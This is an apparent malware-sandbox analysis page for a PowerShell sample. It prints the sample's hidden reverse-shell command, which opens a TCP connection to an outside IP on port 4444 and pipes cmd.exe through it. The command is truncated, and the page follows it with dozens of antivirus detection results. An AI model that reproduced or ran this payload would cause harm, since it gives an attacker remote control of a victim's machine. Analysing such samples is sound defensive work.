Static | ZeroBOX
No static analysis available.
powershell -w hidden -nop -c $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Boxter.m!c
tehtris Clean
Cynet Malicious (score: 99)
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 PowerShell/ReverseShell.BD
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Backdoor.PowerShell.Agent.gen
BitDefender Heur.BZC.PZQ.Boxter.651.479BCFD5
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.651.479BCFD5
Tencent Win32.Backdoor.Agent.Ekjl
TACHYON Clean
Sophos Clean
F-Secure Exploit.EXP/YAV.Minerva.lcapd
DrWeb PowerShell.ReverseShell.24
VIPRE Heur.BZC.PZQ.Boxter.651.479BCFD5
TrendMicro Clean
FireEye Heur.BZC.PZQ.Boxter.651.479BCFD5
Emsisoft Heur.BZC.PZQ.Boxter.651.479BCFD5 (B)
huorong Backdoor/Meterpreter.bo
GData Heur.BZC.PZQ.Boxter.651.479BCFD5
Jiangmin Clean
Varist PSH/Agent.QT
Avira EXP/YAV.Minerva.lcapd
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.651.479BCFD5
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.PowerShell.Agent.gen
Microsoft Trojan:Win32/Casdet!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
ALYac Clean
MAX malware (ai score=85)
VBA32 Clean
Zoner Clean
Rising Backdoor.Agent/PS!1.FF8D (CLASSIC)
Yandex Clean
Ikarus Trojan.Script
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Backdoor:Win/ReverseShell.BF
No IRMA results available.